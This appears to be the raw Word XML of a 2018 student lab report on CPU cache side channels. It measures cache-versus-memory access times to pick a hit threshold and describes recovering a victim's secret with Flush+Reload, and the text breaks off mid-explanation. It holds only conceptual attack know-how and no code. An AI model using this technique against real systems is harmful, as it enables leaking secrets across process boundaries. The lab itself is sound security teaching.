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763B2A" w14:textId="77777777" w:rsidR="00424886" w:rsidRDefault="00A06899">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CSE643 Lab7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C89632" w14:textId="77777777" w:rsidR="00A06899" w:rsidRDefault="00A06899">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Yishi Lu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6836D121" w14:textId="77777777" w:rsidR="00A06899" w:rsidRDefault="00A06899">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10/22/2018</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265FB22B" w14:textId="77777777" w:rsidR="0059651F" w:rsidRDefault="0059651F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ECE7DC6" w14:textId="77777777" w:rsidR="006B3052" w:rsidRPr="00D45C90" w:rsidRDefault="006B3052" w:rsidP="006B3052">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D45C90">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Task1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&amp;2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D45C90">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Side Channel Attacks via CPU Caches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BBF404" w14:textId="77777777" w:rsidR="006B3052" w:rsidRDefault="006B3052" w:rsidP="006B3052">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F8D0430" w14:textId="77777777" w:rsidR="006B3052" w:rsidRDefault="006B3052" w:rsidP="006B3052">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3A1D">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Task1: Reading from Cache versus from Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4042DFBB" w14:textId="36B47D01" w:rsidR="0059651F" w:rsidRDefault="00F77A98">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66534BC4" wp14:editId="4B9F3B58">
            <wp:extent cx="5962650" cy="1942465"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%207.3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8%20at%207.35.34%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62650" cy="1942465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6563DAFF" w14:textId="06A4E699" w:rsidR="00F77A98" w:rsidRDefault="00F77A98">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot1, we compile CacheTime program, and then we run it in 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77A98">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D387368" w14:textId="0A6EF556" w:rsidR="00F77A98" w:rsidRDefault="00F77A98">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01F3CB16" wp14:editId="6D502B0A">
            <wp:extent cx="3278111" cy="1513945"/>
            <wp:effectExtent l="0" t="0" r="0" b="10160"/>
            <wp:docPr id="2" name="Picture 2" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%207.3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18%20at%207.36.0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86378" cy="1517763"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A06056" w14:textId="1072293E" w:rsidR="00F77A98" w:rsidRDefault="00F77A98">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot2, running 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77A98">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidR="00060D4A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039CB164" w14:textId="212FF4C5" w:rsidR="00F77A98" w:rsidRDefault="00F77A98">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23F97BBC" wp14:editId="6CEC7614">
            <wp:extent cx="3251835" cy="1534836"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%207.3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8%20at%207.36.32%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60990" cy="1539157"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="467AC0B2" w14:textId="40FAD0F7" w:rsidR="00F77A98" w:rsidRDefault="00F77A98">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot3, running 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77A98">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21186C2D" w14:textId="77777777" w:rsidR="00F77A98" w:rsidRDefault="00F77A98">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="712F6CAB" w14:textId="67ED492E" w:rsidR="00F77A98" w:rsidRDefault="00F77A98">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="269767F8" wp14:editId="6BCCC3E0">
            <wp:extent cx="3178737" cy="1488440"/>
            <wp:effectExtent l="0" t="0" r="0" b="10160"/>
            <wp:docPr id="4" name="Picture 4" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%207.3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0-18%20at%207.37.08%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80903" cy="1489454"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4049AD47" w14:textId="5340B5CA" w:rsidR="00F77A98" w:rsidRDefault="00F77A98">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot4, running 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77A98">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6589458C" w14:textId="2251B576" w:rsidR="00F77A98" w:rsidRDefault="00F77A98">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09C6DD00" wp14:editId="211BB2A6">
            <wp:extent cx="3137535" cy="1484912"/>
            <wp:effectExtent l="0" t="0" r="12065" b="0"/>
            <wp:docPr id="5" name="Picture 5" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%207.3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0-18%20at%207.38.1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4154" cy="1492777"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0763B3" w14:textId="75302678" w:rsidR="00F77A98" w:rsidRDefault="00F77A98">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot5, running 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77A98">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AF4308" w14:textId="531F4EEA" w:rsidR="00F77A98" w:rsidRDefault="00060D4A">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C66F26D" wp14:editId="5BB4E692">
            <wp:extent cx="3137535" cy="1492962"/>
            <wp:effectExtent l="0" t="0" r="12065" b="5715"/>
            <wp:docPr id="11" name="Picture 11" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%207.4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18%20at%207.46.5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7620" cy="1512036"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E0593E" w14:textId="696F7D8B" w:rsidR="00F77A98" w:rsidRDefault="00F77A98">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot6, running 6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77A98">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00060D4A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CC7277" w14:textId="33E5AD32" w:rsidR="00F77A98" w:rsidRDefault="00F77A98">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="290E721B" wp14:editId="26F5EB39">
            <wp:extent cx="3251835" cy="1551522"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Picture 7" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%207.3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18%20at%207.39.1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4806" cy="1557711"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5110C9F1" w14:textId="7F2F4276" w:rsidR="008B4507" w:rsidRDefault="00F77A98">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot7, running 7</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77A98">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1FFDE4" w14:textId="12D3934B" w:rsidR="008B4507" w:rsidRDefault="00060D4A">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DDCD801" wp14:editId="5B944A02">
            <wp:extent cx="3102935" cy="1488440"/>
            <wp:effectExtent l="0" t="0" r="0" b="10160"/>
            <wp:docPr id="12" name="Picture 12" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%207.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0-18%20at%207.47.2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3153" cy="1493341"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="223EC11E" w14:textId="62E81D3E" w:rsidR="008B4507" w:rsidRDefault="008B4507">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot8, running 8</w:t>
      </w:r>
      <w:r w:rsidRPr="008B4507">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C83688C" w14:textId="399A4DA9" w:rsidR="008B4507" w:rsidRDefault="008B4507">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F92BA83" wp14:editId="087D7A56">
            <wp:extent cx="3137535" cy="1505037"/>
            <wp:effectExtent l="0" t="0" r="12065" b="0"/>
            <wp:docPr id="9" name="Picture 9" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%207.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0-18%20at%207.40.3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0204" cy="1511114"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CAEAE4" w14:textId="44C21BA3" w:rsidR="008B4507" w:rsidRDefault="008B4507">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot9, running 9</w:t>
      </w:r>
      <w:r w:rsidRPr="008B4507">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AB06B1" w14:textId="6174A84D" w:rsidR="008B4507" w:rsidRDefault="00060D4A">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="508D9884" wp14:editId="4F45A0AF">
            <wp:extent cx="3223230" cy="1738766"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="13" name="Picture 13" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%207.4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0-18%20at%207.48.04%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3078" cy="1744078"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F1EE2B" w14:textId="2FD4F161" w:rsidR="008B4507" w:rsidRDefault="008B4507">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot10, running 10</w:t>
      </w:r>
      <w:r w:rsidRPr="008B4507">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76838D69" w14:textId="77777777" w:rsidR="008B4507" w:rsidRDefault="008B4507">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="173CD003" w14:textId="371EC760" w:rsidR="008B4507" w:rsidRPr="008B4507" w:rsidRDefault="008B4507">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B4507">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Observation and Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1304B84B" w14:textId="2D5035A6" w:rsidR="008B4507" w:rsidRDefault="00884FD6">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t>In this task, we run the program</w:t>
      </w:r>
      <w:r w:rsidRPr="00520078">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CacheTime for 10 times. In all these 10 running, we see that array[3*4096] and array[7*4096] always has the lest CPU cycles. The reason is that in the program we access these two element, so their values will be stored in the CPU cache. So accessing them will spend less time than other element in the array.</w:t>
      </w:r>
      <w:r w:rsidR="00060D4A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> For the threshold value, the biggest value for array[3*4096] is 97, and the biggest value for array[7*4096] is 94. The other array elements have no CPU cycles less or equal to 97. Therefore, 97 is a reasonable threshold value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D37535" w14:textId="77777777" w:rsidR="008B4507" w:rsidRDefault="008B4507">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54516A40" w14:textId="77777777" w:rsidR="008E2660" w:rsidRDefault="008E2660">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52660166" w14:textId="77777777" w:rsidR="008E2660" w:rsidRDefault="008E2660">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E509254" w14:textId="77777777" w:rsidR="008E2660" w:rsidRDefault="008E2660">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640A660C" w14:textId="77777777" w:rsidR="008E2660" w:rsidRDefault="008E2660">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0625F30A" w14:textId="77777777" w:rsidR="000576FA" w:rsidRDefault="000576FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="32543AF2" w14:textId="77777777" w:rsidR="000576FA" w:rsidRPr="00EB0158" w:rsidRDefault="000576FA" w:rsidP="000576FA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB0158">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Task2: Using Cache as a Side Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E989B1" w14:textId="32B4EF7F" w:rsidR="000576FA" w:rsidRDefault="00CD37E5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="077618C0" wp14:editId="004BAF28">
            <wp:extent cx="4502211" cy="3545840"/>
            <wp:effectExtent l="0" t="0" r="0" b="10160"/>
            <wp:docPr id="14" name="Picture 14" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%207.5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0-18%20at%207.51.2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2454" cy="3546031"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6254B0DA" w14:textId="74F43498" w:rsidR="00CD37E5" w:rsidRDefault="00CD37E5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B58772D" wp14:editId="767B56E4">
            <wp:extent cx="3500189" cy="3758381"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1270"/>
            <wp:docPr id="15" name="Picture 15" descr="../../../../Desktop/Screen%20Shot%202018-10-18%20at%207.5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0-18%20at%207.51.5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969" cy="3760292"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C1503A" w14:textId="0621A926" w:rsidR="00CD37E5" w:rsidRDefault="00CD37E5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot1, we run the FlushReload program for 20 times. We only get one miss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030C3388" w14:textId="77777777" w:rsidR="00CD37E5" w:rsidRDefault="00CD37E5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D45D8B" w14:textId="77777777" w:rsidR="00821FC1" w:rsidRDefault="00821FC1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BDADE15" w14:textId="77777777" w:rsidR="00CD37E5" w:rsidRPr="008F2C66" w:rsidRDefault="00CD37E5" w:rsidP="00CD37E5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F2C66">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Observation and Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7686A3E4" w14:textId="1056DB9D" w:rsidR="00CD37E5" w:rsidRDefault="00CD37E5" w:rsidP="00CD37E5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">In this task, we use the side channel to get a secret value by a victim function. The method which we used is called Flush and Reload. The mechanism is that we first flush the whole array. Then we call the victim function which will access the secret in the array. Then we reload the whole array. Because the secret is accessed by the victim function, it is cached in the CPU; </w:t>
      </w:r>
      <w:r w:rsidR="00847BD0">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">so </w:t>
